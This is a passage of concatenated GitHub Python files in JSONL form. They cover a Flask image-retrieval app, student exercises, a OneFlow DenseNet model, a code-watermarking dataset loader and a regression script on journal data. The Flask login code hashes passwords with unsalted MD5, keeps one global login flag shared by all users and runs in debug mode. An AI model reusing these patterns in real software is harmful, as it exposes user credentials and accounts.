'XCEPTION_false_rmac' : True},\n 'distance' : {'is_selected' : True, 'vect' : 'euclidean', 'matrix' : 'bruteForceMatching'},\n 'input' : {'is_selected' : False,},\n 'result' : {},\n 'show' : {},\n 'vector' : ['BGR', 'HSV', 'GLCM', 'HOG', 'LBP', 'VGG16_false', 'XCEPTION_false', 'MOBILENET_false', 'XCEPTION_true', 'VGG16_false_pca', 'XCEPTION_false_pca', 'MOBILENET_false_pca', 'XCEPTION_true_pca', 'VGG16_false_rmac', 'XCEPTION_false_rmac', 'MOBILENET_false_rmac', 'XCEPTION_true_rmac'],\n 'matrix' : ['SIFT', 'ORB'],\n 'metrics' : {'classe': {},'subclasse': {}}}\n\n@app.route('/', methods = ['GET', 'POST'])\ndef main():\n\n # if not logged in, redirect to login page\n if not cfg.get('logged_in'):\n return render_template('login.html')\n\n if request.method == 'POST' and 'form_desc' in request.form:\n get_descriptor_form()\n if request.method == 'POST' and 'form_dist' in request.form:\n get_distance_form()\n if request.method == 'POST' and 'form_input_image' in request.form:\n get_input_form()\n\n # indexation of the query image and search for best matches\n if request.method == 'POST' and 'form_search' in request.form:\n\n # check if all required fields are selected\n if not (cfg['descriptors']['is_selected'] and cfg['distance']['is_selected'] and cfg['input']['is_selected']):\n flash('[CONFIG] Missing configuration')\n return redirect(request.url)\n\n # get all parameters\n img_path = cfg['input']['img_path']\n descriptors = [k for k, v in cfg['descriptors'].items() if v == True and k != 'is_selected']\n distance_vect = cfg['distance']['vect']\n distance_matrix = cfg['distance']['matrix']\n\n start = time()\n result = recherche(mongo, img_path, descriptors, distance_vect, distance_matrix, cfg) \n cfg['result']['time'] = int(time() - start) # time in seconds\n cfg['result']['names'] = result # list of names of the ordered best matches\n cfg['result']['done'] = True # search is done\n\n # if image query is in the database, analyze metrics\n if cfg['input']['is_in_database']:\n save_metrics(cfg, mongo)\n\n if request.method == 'POST' and 'form_top_20' in request.form:\n cfg['show']['20'] = True\n cfg['show']['50'] = False\n cfg['show']['rp'] = False\n if request.method == 'POST' and 'form_top_50' in request.form:\n cfg['show']['20'] = False\n cfg['show']['50'] = True\n cfg['show']['rp'] = False\n if request.method == 'POST' and 'form_rp' in request.form:\n cfg['show']['20'] = False\n cfg['show']['50'] = False\n cfg['show']['rp'] = True\n\n return render_template('index.html', cfg = cfg)\n\n\n@app.route('/login', methods = ['POST'])\ndef login():\n if request.method == 'POST' and 'form_register' in request.form:\n return render_template('register.html')\n\n if request.method == 'POST' and 'form_login' in request.form:\n user = request.form.get('username')\n pwd = request.form.get('password')\n hash_pwd = hashlib.md5(pwd.encode())\n if mongo.users.find_one({'username': user, 'password': hash_pwd.hexdigest()}):\n cfg['logged_in'] = True\n else:\n flash('[LOGIN] Wrong credentials')\n return redirect(url_for('main'))\n\n@app.route('/register', methods=['POST'])\ndef register():\n if request.method == 'POST' and 'form_register' in request.form:\n user = request.form.get('username')\n pwd = request.form.get('password')\n pwd_again = request.form.get('password_again')\n if pwd != pwd_again:\n flash('Wrong password')\n return render_template('register.html')\n # elif mongo.users.find_one({'username': user}):\n # flash('User already exists')\n # return render_template('register.html')\n else:\n hash_pwd = hashlib.md5(pwd.encode())\n mongo.users.insert_one({'username': user, 'password': hash_pwd.hexdigest()})\n cfg['logged_in'] = True\n return redirect(url_for('main'))\n\n@app.route('/logout')\ndef logout():\n cfg['logged_in'] = False\n return main()\n\n@app.route('/history')\ndef history():\n return render_template('history.html', mongo = mongo)\n\n@app.route('/help')\ndef help():\n return render_template('help.html')\n\n\ndef get_descriptor_form():\n cfg['descriptors']['is_selected'] = False\n\n # get status of checkboxes for descriptors\n cfg['descriptors']['SIFT'] = True if request.form.get('SIFT') != None else False\n cfg['descriptors']['BGR'] = True if request.form.get('BGR') != None else False\n cfg['descriptors']['GLCM'] = True if request.form.get('GLCM') != None else False\n cfg['descriptors']['HOG'] = True if request.form.get('HOG') != None else False\n cfg['descriptors']['HSV'] = True if request.form.get('HSV') != None else False\n cfg['descriptors']['LBP'] = True if request.form.get('LBP') != None else False\n cfg['descriptors']['ORB'] = True if request.form.get('ORB') != None else False\n \n cfg['descriptors']['VGG16_false'] = True if request.form.get('VGG16_false') != None else False\n cfg['descriptors']['XCEPTION_false'] = True if request.form.get('XCEPTION_false') != None else False\n cfg['descriptors']['XCEPTION_true'] = True if request.form.get('XCEPTION_true') != None else False\n cfg['descriptors']['MOBILENET_false'] = True if request.form.get('MOBILENET_false') != None else False\n \n cfg['descriptors']['VGG16_false_pca'] = True if request.form.get('VGG16_false_pca') != None else False\n cfg['descriptors']['XCEPTION_false_pca'] = True if request.form.get('XCEPTION_false_pca') != None else False\n cfg['descriptors']['XCEPTION_true_pca'] = True if request.form.get('XCEPTION_true_pca') != None else False\n cfg['descriptors']['MOBILENET_false_pca'] = True if request.form.get('MOBILENET_false_pca') != None else False\n \n cfg['descriptors']['VGG16_false_rmac'] = True if request.form.get('VGG16_false_rmac') != None else False\n cfg['descriptors']['XCEPTION_false_rmac'] = True if request.form.get('XCEPTION_false_rmac') != None else False\n cfg['descriptors']['XCEPTION_true_rmac'] = True if request.form.get('XCEPTION_true_rmac') != None else False\n cfg['descriptors']['MOBILENET_false_rmac'] = True if request.form.get('MOBILENET_false_rmac') != None else False\n\n # check if at least one descriptor is selected\n cfg['descriptors']['is_selected'] = any(cfg['descriptors'].values())\n\n # if no descriptor selected, flash error\n if not cfg['descriptors']['is_selected']:\n flash('[CONFIG] No Descriptor selected')\n return redirect(request.url)\n\ndef get_distance_form():\n cfg['distance']['is_selected'] = False\n\n # get selected distance for vector and matrix\n cfg['distance']['vect'] = request.form.get('distance_vect')\n cfg['distance']['matrix'] = request.form.get('distance_matrix')\n\n # check if at least one distance is selected for each category\n cfg['distance']['is_selected'] = False if cfg['distance']['vect'] is None or cfg['distance']['vect'] is None else True\n\n # if distance is not selected, flash error\n if not cfg['distance']['is_selected']:\n if cfg['distance']['vect'] is None:\n flash('[CONFIG] No vector distance selected')\n if cfg['distance']['matrix'] is None:\n flash('[CONFIG] No matrix distance selected')\n return redirect(request.url)\n\ndef get_input_form():\n cfg['input']['is_selected'] = False\n cfg['input']['img_path'] = None\n\n # check if image is uploaded\n if 'file' not in request.files:\n flash('[FILE] No file selected')\n return redirect(request.url)\n\n # parse uploaded file\n file = request.files['file']\n filename = file.filename\n allowed_file = '.' in filename and filename.rsplit('.', 1)[1].lower() in ['png', 'jpg', 'jpeg']\n\n # check if file is selected\n if file.filename == '':\n flash('[FILE] No file selected')\n return redirect(request.url)\n\n # check if file is allowed\n elif allowed_file:\n # save file to static/img_loaded\n os.makedirs(os.path.join('static', 'img_loaded'), exist_ok = True)\n file.save(os.path.join('static', 'img_loaded', secure_filename(file.filename)))\n cfg['input']['is_selected'] = True\n path = 'static/img_loaded/' + file.filename\n cfg['input']['img_path'] = path\n cfg['input']['is_in_database'] = True if file.filename in os.listdir('static/db/') else False\n\n\n # if file is not allowed, flash error\n else:\n flash('[FILE] Wrong file format')\n \nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"ValentinCord/Web_Based_Multimedia_Retrieval","sub_path":"webserver/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26891463223","text":"score = int(input(\"Enter score: \"))\n\nif score < 0 or score > 100:\n print(\"Score must be in the range of 0-100\")\n\nelse:\n grading_type = input(\"Is the grading differentiated or non-differentiated (d/n)? \")\n try:\n if grading_type == \"d\":\n if score >= 90:\n print(\"A\")\n elif score >= 80:\n print(\"B\")\n elif score >= 70:\n print(\"C\")\n elif score >= 60:\n print(\"D\")\n elif score >= 50:\n print(\"E\")\n else:\n print(\"F\")\n elif grading_type == \"n\":\n if score >= 50:\n print(\"PASSED\")\n else:\n print(\"FAILED\")\n else:\n print(\"Grading type not recognized\")\n except ValueError:\n print(\"Grading type not recognized\")\n","repo_name":"Nurech/Python_LTAT.03.001","sub_path":"homeworks/02.17/class1.py","file_name":"class1.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27601475264","text":"from c12_concurrency.p11_implement_publish_subscribe_messaging.exchange import get_exchange\n\n\nclass Task:\n def send(self, msg):\n print(self, msg)\n\n\ntask_a = Task()\ntask_b = Task()\n\nexc = get_exchange('name')\nwith exc.subscribe(task_a, task_b):\n exc.send('msg1')\n exc.send('msg2')\nprint()\n\n\nclass DisplayMessages:\n def __init__(self):\n self.count = 0\n\n def send(self, msg):\n self.count += 1\n print('msg[{}]: {!r}'.format(self.count, msg))\n\n\nd = DisplayMessages()\nexc = get_exchange('name')\nwith exc.subscribe(d):\n exc.send('ttt')\n exc.send('aaa')\n","repo_name":"mofei952/cookbook","sub_path":"c12_concurrency/p11_implement_publish_subscribe_messaging/01_publish_subscribe.py","file_name":"01_publish_subscribe.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39537704714","text":"import oneflow as flow\nimport oneflow.nn as nn\nimport oneflow.nn.functional as F\n\n\nclass _DenseLayer(nn.Sequential):\n\n def __init__(self, num_input_features, growth_rate, bn_size, drop_rate):\n super(_DenseLayer, self).__init__()\n self.add_module('norm', nn.BatchNorm3d(num_input_features)),\n self.add_module('elu', nn.ELU(inplace=True)),\n self.add_module('conv', nn.Conv3d(num_input_features, growth_rate,\n kernel_size=3, stride=1, padding=1, bias=False)),\n self.drop_rate = drop_rate\n\n def forward(self, x):\n # Concatenation\n new_features = super(_DenseLayer, self).forward(x)\n if self.drop_rate > 0:\n new_features = F.dropout(new_features, p=self.drop_rate, training=self.training)\n return flow.cat([x, new_features], 1)\n\n\nclass _DenseBlock(nn.Sequential):\n\n def __init__(self, num_layers, num_input_features, bn_size, growth_rate, drop_rate):\n super(_DenseBlock, self).__init__()\n for i in range(num_layers):\n layer = _DenseLayer(num_input_features + i * growth_rate,\n growth_rate=growth_rate,\n bn_size=bn_size,\n drop_rate=drop_rate)\n self.add_module('denselayer%d' % (i + 1), layer)\n\n\nclass Generator(nn.Module):\n\n def __init__(self, ngpu, growth_rate=16, block_config=(4, 4, 4, 4),\n bn_size=2, drop_rate=0):\n\n super(Generator, self).__init__()\n # First convolution\n self.conv0 = nn.Conv3d(1, 2 * growth_rate, kernel_size=3, padding=1, bias=False)\n\n # Each denseblock\n num_features = 2 * growth_rate # 2k\n num_features_cat = num_features\n self.block0 = _DenseBlock(num_layers=block_config[0], num_input_features=num_features,\n bn_size=bn_size, growth_rate=growth_rate, drop_rate=drop_rate)\n num_features_cat += block_config[0] * growth_rate + num_features\n self.comp0 = nn.Conv3d(num_features_cat, num_features,\n kernel_size=1, stride=1, bias=False)\n\n self.block1 = _DenseBlock(num_layers=block_config[1], num_input_features=num_features,\n bn_size=bn_size, growth_rate=growth_rate, drop_rate=drop_rate)\n num_features_cat += block_config[1] * growth_rate + num_features\n self.comp1 = nn.Conv3d(num_features_cat, num_features,\n kernel_size=1, stride=1, bias=False)\n\n self.block2 = _DenseBlock(num_layers=block_config[2], num_input_features=num_features,\n bn_size=bn_size, growth_rate=growth_rate, drop_rate=drop_rate)\n num_features_cat += block_config[2] * growth_rate + num_features\n self.comp2 = nn.Conv3d(num_features_cat, num_features,\n kernel_size=1, stride=1, bias=False)\n\n self.block3 = _DenseBlock(num_layers=block_config[3], num_input_features=num_features,\n bn_size=bn_size, growth_rate=growth_rate, drop_rate=drop_rate)\n num_features_cat += block_config[3] * growth_rate + num_features\n self.recon = nn.Conv3d(num_features_cat, 1,\n kernel_size=1, stride=1, bias=False)\n\n # Official init from flow repo.\n for m in self.modules():\n if isinstance(m, nn.Conv3d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm3d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def forward(self, x):\n x = self.conv0(x)\n out = self.block0(x)\n features = flow.cat([x, out], 1)\n out = self.comp0(features)\n\n out = self.block1(out)\n features = flow.cat([features, out], 1)\n out = self.comp1(features)\n\n out = self.block2(out)\n features = flow.cat([features, out], 1)\n out = self.comp2(features)\n\n out = self.block3(out)\n features = flow.cat([features, out], 1)\n out = self.recon(features)\n return out\n","repo_name":"DsLipku/Oneflow-model","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16509879078","text":"from multiprocessing import Pool \nimport pandas as pd\n\ndef reducer(df):\n dfMunicipio = df.filter(items=[df.columns[1]])\n dfGrouped = dfMunicipio.groupby([dfMunicipio.columns[0]]).size()\n return dfGrouped\n\n\n\ndf = pd.read_csv('../dataset/datos.csv', delimiter=';', encoding='ISO-8859-1')\ndf.head()\n\np = Pool(processes=3)\nprint(\"antes de map\") \nresult = p.map(reducer, df)\nprint(\"ya va a imprimir el cosigo\")\nprint(result.to_string())","repo_name":"sortizs/pr4-hpc","sub_path":"concept_test/script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13401602798","text":"import os\nimport json\n\nfrom tqdm import tqdm\nfrom multiprocessing import Pool\n\nfrom .code_vocab import CodeVocab\nfrom .data_instance import (DataInstance, WMDetectionDataInstance,\n DewatermarkingDataInstance)\nfrom .code_dataset import (JsonlCodeWatermarkDataset, JsonlWMDetectionDataset,\n JsonlTaskedCodeWatermarkDataset, JsonlDewatermarkingDataset)\nfrom benchmark_mbxp import compose_function_java, compose_function_javascript\nfrom code_tokenizer import CodeTokenizer\nfrom typing import List, Dict\n\n\nclass JsonlDatasetProcessor:\n def __init__(self, lang: str = 'cpp') -> None:\n self.lang = lang\n # self.code_tokenizer = CodeTokenizer(lang=lang)\n\n def load_jsonl(self, data_dir: str, split: str, show_progress: bool = True) -> List:\n fpath = os.path.join(data_dir, f'{split}.jsonl')\n with open(fpath, 'r', encoding='utf-8') as fi:\n lines = fi.readlines()\n objs = [json.loads(line) for line in lines]\n\n instances = []\n args = []\n for i, obj in enumerate(objs):\n args.append((i, obj, split))\n\n with Pool(os.cpu_count() // 2) as pool:\n result = pool.imap(self._mp_process_instances_wrapper, args)\n\n if show_progress:\n result = tqdm(result, desc=f'{split:10}', total=len(objs))\n\n for res in result:\n instances.append(res)\n\n return instances\n\n def load_raw_jsonl(self, data_dir: str, split: str):\n fpath = os.path.join(data_dir, f'{split}.jsonl')\n with open(fpath, 'r', encoding='utf-8') as fi:\n lines = fi.readlines()\n objs = [json.loads(line) for line in lines]\n return objs\n\n def _mp_process_instances_wrapper(self, args):\n return self._process_instance(*args)\n\n def load_jsonls(self, data_dir: str, show_progress: bool = True) -> Dict[str, List]:\n\n train_instances = self.load_jsonl(data_dir,\n split='train',\n show_progress=show_progress)\n valid_instances = self.load_jsonl(data_dir,\n split='valid',\n show_progress=show_progress)\n test_instances = self.load_jsonl(data_dir,\n split='test',\n show_progress=show_progress)\n\n return {\n 'train': train_instances,\n 'valid': valid_instances,\n 'test': test_instances\n }\n\n def _process_instance(self, id: int, data_obj: Dict, split: str):\n raise NotImplementedError()\n\n def build_dataset(self, instances: List, vocab: CodeVocab):\n raise NotImplementedError()\n\n def build_vocab(self, instances: List) -> CodeVocab:\n raise NotImplementedError()\n\n\nclass JsonlWMDatasetProcessor(JsonlDatasetProcessor):\n def __init__(self, lang: str = 'cpp') -> None:\n super().__init__(lang)\n\n def _process_instance(self, id: int, data_obj: Dict, split: str) -> DataInstance:\n source = data_obj['original_string']\n code_tokenizer = CodeTokenizer(lang=self.lang)\n code_tokens, word_tokens = code_tokenizer.get_tokens(source)\n return DataInstance(id=f'{split}#{id}',\n source=source,\n source_tokens=code_tokens,\n tokens=word_tokens,\n transform_keys=None)\n\n def build_dataset(self, instances: List[DataInstance],\n vocab: CodeVocab) -> JsonlCodeWatermarkDataset:\n return JsonlCodeWatermarkDataset(instances, vocab)\n\n def build_vocab(self, instances: List[DataInstance]) -> CodeVocab:\n vocab = CodeVocab()\n for instance in instances:\n for tok in instance.tokens:\n vocab.add_word(tok)\n\n return vocab\n\n def load_jsonls(self,\n data_dir: str,\n show_progress: bool = True) -> Dict[str, List[DataInstance]]:\n return super().load_jsonls(data_dir, show_progress)\n\n def _process_instance_fast(self, id: int, data_obj: Dict, split: str) -> DataInstance:\n source = data_obj['original_string']\n return DataInstance(id=f'{split}#{id}',\n source=source,\n source_tokens=None,\n tokens=None,\n transform_keys=None)\n\n def _load_jsonl_fast(self, data_dir: str, split: str, show_progress: bool = True):\n fpath = os.path.join(data_dir, f'{split}.jsonl')\n with open(fpath, 'r', encoding='utf-8') as fi:\n lines = fi.readlines()\n objs = [json.loads(line) for line in lines]\n\n instances = []\n if show_progress:\n objs = tqdm(objs, desc=f'{split:10}')\n\n for i, obj in enumerate(objs):\n instances.append(self._process_instance_fast(i, obj, split))\n\n return instances\n\n def load_jsonls_fast(self,\n data_dir: str,\n show_progress: bool = True) -> Dict[str, List[DataInstance]]:\n # only loads source code strings, no tokenization\n # for preprocessing only\n train_instances = self._load_jsonl_fast(data_dir,\n split='train',\n show_progress=show_progress)\n valid_instances = self._load_jsonl_fast(data_dir,\n split='valid',\n show_progress=show_progress)\n test_instances = self._load_jsonl_fast(data_dir,\n split='test',\n show_progress=show_progress)\n\n return {\n 'train': train_instances,\n 'valid': valid_instances,\n 'test': test_instances\n }\n\n\nclass JsonlTaskedWMDatasetProcessor(JsonlDatasetProcessor):\n def __init__(self, label_key: str, lang: str = 'cpp') -> None:\n super().__init__(lang)\n self.label_key = label_key\n\n def _process_instance(self, id: int, data_obj: Dict, split: str) -> DataInstance:\n source = data_obj['original_string']\n label = data_obj[self.label_key]\n code_tokenizer = CodeTokenizer(lang=self.lang)\n code_tokens, word_tokens = code_tokenizer.get_tokens(source)\n return DataInstance(id=f'{split}#{id}',\n source=source,\n source_tokens=code_tokens,\n tokens=word_tokens,\n task_label=label,\n transform_keys=None)\n\n def build_dataset(self,\n instances: List[DataInstance],\n vocab: CodeVocab,\n label2idx: Dict[str, int],\n is_validation: bool = False) -> JsonlTaskedCodeWatermarkDataset:\n return JsonlTaskedCodeWatermarkDataset(instances, vocab, label2idx, is_validation)\n\n def build_label_dict(self, instances: List[DataInstance]):\n label2idx = dict()\n idx2label = list()\n for instance in instances:\n if instance.task_label not in label2idx:\n label2idx[instance.task_label] = len(idx2label)\n idx2label.append(instance.task_label)\n return label2idx, idx2label\n\n def build_vocab(self, instances: List[DataInstance]) -> CodeVocab:\n vocab = CodeVocab()\n for instance in instances:\n for tok in instance.tokens:\n vocab.add_word(tok)\n\n return vocab\n\n def load_jsonls(self,\n data_dir: str,\n show_progress: bool = True) -> Dict[str, List[DataInstance]]:\n return super().load_jsonls(data_dir, show_progress)\n\n\nclass JsonlDetectionDatasetProcessor(JsonlDatasetProcessor):\n def __init__(self, lang: str = 'cpp') -> None:\n super().__init__(lang)\n\n def load_jsonls(\n self,\n data_dir: str,\n show_progress: bool = True) -> Dict[str, List[WMDetectionDataInstance]]:\n return super().load_jsonls(data_dir, show_progress)\n\n def _process_instance(self, id: int, obj: Dict,\n split: str) -> WMDetectionDataInstance:\n source = obj['after_watermark']\n contains_watermark = obj['contains_watermark']\n code_tokenizer = CodeTokenizer(lang=self.lang)\n _, word_tokens = code_tokenizer.get_tokens(source)\n return WMDetectionDataInstance(id=f'{split}#{id}',\n source=source,\n tokens=word_tokens,\n label=contains_watermark)\n\n def build_dataset(self, instances: List, vocab: CodeVocab) -> JsonlWMDetectionDataset:\n return JsonlWMDetectionDataset(instances, vocab)\n\n def build_vocab(self, instances: List[WMDetectionDataInstance]) -> CodeVocab:\n vocab = CodeVocab()\n for instance in instances:\n for tok in instance.tokens:\n vocab.add_word(tok)\n\n return vocab\n\n def _process_instance_fast(self, id: int, data_obj: Dict,\n split: str) -> WMDetectionDataInstance:\n source = data_obj['after_watermark']\n contains_watermark = data_obj['contains_watermark']\n tokens = source.strip().split(' ')\n return WMDetectionDataInstance(id=f'{split}#{id}',\n source=source,\n tokens=tokens,\n label=contains_watermark)\n\n def _load_jsonl_fast(self, data_dir: str, split: str, show_progress: bool = True):\n fpath = os.path.join(data_dir, f'{split}.jsonl')\n with open(fpath, 'r', encoding='utf-8') as fi:\n lines = fi.readlines()\n objs = [json.loads(line) for line in lines]\n\n instances = []\n if show_progress:\n objs = tqdm(objs, desc=f'{split:10}')\n\n for i, obj in enumerate(objs):\n instances.append(self._process_instance_fast(i, obj, split))\n\n return instances\n\n def load_jsonls_fast(\n self,\n data_dir: str,\n show_progress: bool = True) -> Dict[str, List[WMDetectionDataInstance]]:\n # only loads source code strings, no tokenization\n # for awt outputs only\n train_instances = self._load_jsonl_fast(data_dir,\n split='train',\n show_progress=show_progress)\n valid_instances = self._load_jsonl_fast(data_dir,\n split='valid',\n show_progress=show_progress)\n test_instances = self._load_jsonl_fast(data_dir,\n split='test',\n show_progress=show_progress)\n\n return {\n 'train': train_instances,\n 'valid': valid_instances,\n 'test': test_instances\n }\n\n\nclass JsonlDewatermarkingDatasetProcessor(JsonlDatasetProcessor):\n def __init__(self, lang: str = 'cpp') -> None:\n super().__init__(lang)\n\n def load_jsonls(\n self,\n data_dir: str,\n show_progress: bool = True) -> Dict[str, List[DewatermarkingDataInstance]]:\n return super().load_jsonls(data_dir, show_progress)\n\n def _process_instance(self, id: int, obj: Dict, split: str):\n source = obj['after_watermark']\n target = obj['original_string']\n code_tokenizer = CodeTokenizer(lang=self.lang)\n _, source_tokens = code_tokenizer.get_tokens(source)\n _, target_tokens = code_tokenizer.get_tokens(target)\n return DewatermarkingDataInstance(id=f'{split}#{id}',\n source=source,\n source_tokens=source_tokens,\n target=target,\n target_tokens=target_tokens)\n\n def build_dataset(self, instances: List,\n vocab: CodeVocab) -> JsonlDewatermarkingDataset:\n return JsonlDewatermarkingDataset(instances, vocab)\n\n def build_vocab(self, instances: List[DewatermarkingDataInstance]) -> CodeVocab:\n vocab = CodeVocab()\n for instance in instances:\n for tok in instance.source_tokens:\n vocab.add_word(tok)\n for tok in instance.target_tokens:\n vocab.add_word(tok)\n\n return vocab\n","repo_name":"YBRua/SrcMarker","sub_path":"data_processing/dataset_processor.py","file_name":"dataset_processor.py","file_ext":"py","file_size_in_byte":12804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70744995367","text":"import csv\nfrom math import *\nimport numpy\nfrom itertools import combinations\n\ndef obtain_constants(Y,X):\n return numpy.dot(numpy.dot(numpy.linalg.pinv(numpy.dot(numpy.transpose(X),X)),numpy.transpose(X)),Y)\n\ncsv.register_dialect('myDialect',\ndelimiter = ';',\nskipinitialspace=True)\n\nwith open('scimagojr_journal.csv', 'r') as csvFile, open('TEMP1.csv', 'w') as csvFile2:\n reader = csv.reader(csvFile, dialect='myDialect')\n P=0\n c=0\n count=0\n for roww in reader:\n if P>0:\n if int(roww[12])>0:\n count+=1\n P+=1\n COUNT=floor(0.8*count)\n\nwith open('scimagojr_journal.csv', 'r') as csvFile, open('TEMP1.csv', 'w') as csvFile2:\n reader = csv.reader(csvFile, dialect='myDialect')\n LIST_orig=[]\n for roww in reader:\n if c==0:\n data=[roww[2],roww[5],roww[7],roww[8],roww[9],roww[10],roww[11],roww[12],roww[13],roww[14],\"Impact Factor\"]\n writer = csv.writer(csvFile2)\n writer.writerow(data)\n\n elif c>0 and c0 :\n imp=int(roww[11])/int(roww[12])\n roww[5]=roww[5].replace(\",\",\".\")\n roww[12]=roww[12].replace(\",\",\".\")\n roww[13]=roww[13].replace(\",\",\".\")\n roww[14]=roww[14].replace(\",\",\".\")\n \n data=[roww[2],float(roww[5]),int(roww[7]),int(roww[8]),int(roww[9]),int(roww[10]),int(roww[11]),float(roww[12]),float(roww[13]),float(roww[14]),round(imp,5)]\n writer = csv.writer(csvFile2)\n writer.writerow(data)\n \n elif c>=COUNT and int(roww[12])>0:\n imp=int(roww[11])/int(roww[12])\n LIST_orig.append(round(imp,5))\n \n roww[5]=roww[5].replace(\",\",\".\")\n roww[12]=roww[12].replace(\",\",\".\")\n roww[13]=roww[13].replace(\",\",\".\")\n roww[14]=roww[14].replace(\",\",\".\")\n\n data=[roww[2],float(roww[5]),int(roww[7]),int(roww[8]),int(roww[9]),int(roww[10]),int(roww[11]),float(roww[12]),float(roww[13]),float(roww[14]),float(-10)]\n writer = csv.writer(csvFile2)\n writer.writerow(data)\n c+=1\n\ncsvFile.close()\ncsvFile2.close()\n \nwith open('TEMP1.csv', 'r') as csvFile3:\n reader = csv.reader(csvFile3)\n q=0\n LIST_1=[]\n LIST_2=[]\n LIST_3=[]\n LIST_4=[]\n LIST_5=[]\n LIST_6=[]\n LIST_7=[]\n LIST_8=[]\n LIST_9=[]\n LIST_imp_fac=[]\n \n LIST_1_testing=[]\n LIST_2_testing=[]\n LIST_3_testing=[]\n LIST_4_testing=[]\n LIST_5_testing=[]\n LIST_6_testing=[]\n LIST_7_testing=[]\n LIST_8_testing=[]\n LIST_9_testing=[]\n\n for roww in reader:\n if q>0 and q%2==0 and float(roww[10])!=-10.0:\n LIST_1.append(float(roww[1])) \n LIST_2.append(int(roww[2])) \n LIST_3.append(int(roww[3])) \n LIST_4.append(int(roww[4])) \n LIST_5.append(int(roww[5]))\n LIST_6.append(int(roww[6]))\n LIST_7.append(float(roww[7]))\n LIST_8.append(float(roww[8]))\n LIST_9.append(float(roww[9]))\n LIST_imp_fac.append(float(roww[10])) \n\n elif q>0 and q%2==0 and float(roww[10])==-10.0:\n LIST_1_testing.append(float(roww[1])) \n LIST_2_testing.append(int(roww[2])) \n LIST_3_testing.append(int(roww[3])) \n LIST_4_testing.append(int(roww[4])) \n LIST_5_testing.append(int(roww[5]))\n LIST_6_testing.append(int(roww[6]))\n LIST_7_testing.append(float(roww[7]))\n LIST_8_testing.append(float(roww[8]))\n LIST_9_testing.append(float(roww[9]))\n q+=1 \ncsvFile3.close()\n\ntotality_list=[]\ntotality_list.append(LIST_1)\ntotality_list.append(LIST_2)\ntotality_list.append(LIST_3)\ntotality_list.append(LIST_4)\ntotality_list.append(LIST_5)\ntotality_list.append(LIST_6)\ntotality_list.append(LIST_7)\ntotality_list.append(LIST_8)\ntotality_list.append(LIST_9)\n\ntotality_list_testing=[]\ntotality_list_testing.append(LIST_1_testing)\ntotality_list_testing.append(LIST_2_testing)\ntotality_list_testing.append(LIST_3_testing)\ntotality_list_testing.append(LIST_4_testing)\ntotality_list_testing.append(LIST_5_testing)\ntotality_list_testing.append(LIST_6_testing)\ntotality_list_testing.append(LIST_7_testing)\ntotality_list_testing.append(LIST_8_testing)\ntotality_list_testing.append(LIST_9_testing)\n\nCOMBOS=sum([list(map(list,combinations(totality_list,i)))for i in range(len(totality_list)+1)],[])\nCOMBOS.remove([])\naddo=[1]*461\naddo_testing=[1]*117\n\nCOMBOS_testing=sum([list(map(list,combinations(totality_list_testing,i)))for i in range(len(totality_list_testing)+1)],[])\nCOMBOS_testing.remove([])\n\nfor i in range(len(COMBOS)):\n COMBOS[i].insert(0,addo)\n\nfor i in range(len(COMBOS_testing)):\n COMBOS_testing[i].insert(0,addo_testing)\n\nall_combinations=[]\nall_combinations_testing=[]\n\nfor i in range(len(COMBOS)):\n all_combinations.append(numpy.transpose(COMBOS[i]))\n\nfor i in range(len(COMBOS_testing)):\n all_combinations_testing.append(numpy.transpose(COMBOS_testing[i]))\n\ntemp=[]\ntemp.append(LIST_imp_fac)\nY_impact=numpy.transpose(temp)\n\nconstants_all=[]\nfor i in range(len(all_combinations)):\n constants_all.append(obtain_constants(Y_impact,all_combinations[i]))\n\npredicted_Y=[]\nfor i in range(len(all_combinations_testing)):\n predicted_Y.append(numpy.dot(all_combinations_testing[i],constants_all[i]))\n\na=[]\nfor i in range(len(predicted_Y)): \n a.append(numpy.transpose(predicted_Y[i]))\n\nb=[]\nfor i in range(len(predicted_Y)):\n b.append(a[i][0])\n\nERROR_list=[]\nMAE=[]\nfor i in range(len(b)):\n SUM=0\n abso=0\n for j in range(len(b[0])):\n SUM+=(b[i][j]-LIST_orig[j])**2\n abso+=abs(b[i][j]-LIST_orig[j])\n MEAN_E=SUM/len(LIST_orig)\n abso_E=abso/len(LIST_orig)\n MAE.append(abso_E)\n ERROR_list.append(MEAN_E)\n\nw=sorted(ERROR_list)\nw2=sorted(MAE)\n\n\ndictionary=[\"SJR\",\"H Index\",\"Total Docs(2017)\",\"Total Docs(3years)\",\"Total Refs\",\"Total Cites(3years)\",\"Citable Docs(3years)\",\"Cites/Doc(2years)\",\"Ref/Doc\"]\nwhich_combi = sum([list(map(list, combinations(dictionary, i))) for i in range(len(dictionary) + 1)], [])\nwhich_combi.remove([])\n\nwith open('ERRORS_all.csv','w') as File1:\n data=[\"Combination no\",\"Combination\",\"Mean Absolute Error\", \"Mean Squared error\",\"Root Mean Squared Error\"]\n writer = csv.writer(File1)\n writer.writerow(data)\n\n for i in range(len(w)):\n if \"Cites/Doc(2years)\" not in str(which_combi[i])[1:-1]: \n data=[i+1,str(which_combi[i])[1:-1], MAE[i], ERROR_list[i] ,ERROR_list[i]**.5 ]\n writer = csv.writer(File1)\n writer.writerow(data)\nFile1.close\n\n\nwith open('RMSE_min.csv', 'w') as File2:\n data=[\"Combination no\",\"Combination\",\"Mean Squared error\",\"Root Mean Squared Error\"]\n writer = csv.writer(File2)\n writer.writerow(data)\n\n for i in range(len(w)):\n if \"Cites/Doc(2years)\" not in str(which_combi[ERROR_list.index(w[i])])[1:-1]: \n 